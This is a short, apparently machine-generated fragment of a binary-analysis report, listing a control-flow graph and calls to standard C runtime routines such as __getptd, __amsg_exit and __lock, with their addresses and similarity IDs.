                                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                • String ID:
                                                • API String ID: 2714421763-0

                                                Control-flow Graph

                                                control_flow_graph 223 1f3e04-1f3e1f call 1f264c call 1f2345 228 1f3e43-1f3e6c call 1f2aa0 call 1f3dc6 call 1f3e6e 223->228 229 1f3e21-1f3e25 223->229 236 1f3e2f-1f3e31 228->236 229->228 230 1f3e27-1f3e2c call 1f2345 229->230 230->236 238 1f3e3b-1f3e42 call 1f2691 236->238 239 1f3e33-1f3e3a call 1f1411 236->239 239->238
                                                APIs
                                                • __getptd.LIBCMT ref: 001F3E10
                                                  • Part of subcall function 001F2345: __getptd_noexit.LIBCMT ref: 001F2348
                                                  • Part of subcall function 001F2345: __amsg_exit.LIBCMT ref: 001F2355
                                                • __getptd.LIBCMT ref: 001F3E27
                                                • __amsg_exit.LIBCMT ref: 001F3E35
                                                • __lock.LIBCMT ref: 001F3E45
                                                Similarity
                                                • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                • String ID:
                                                • API String ID: 3521780317-0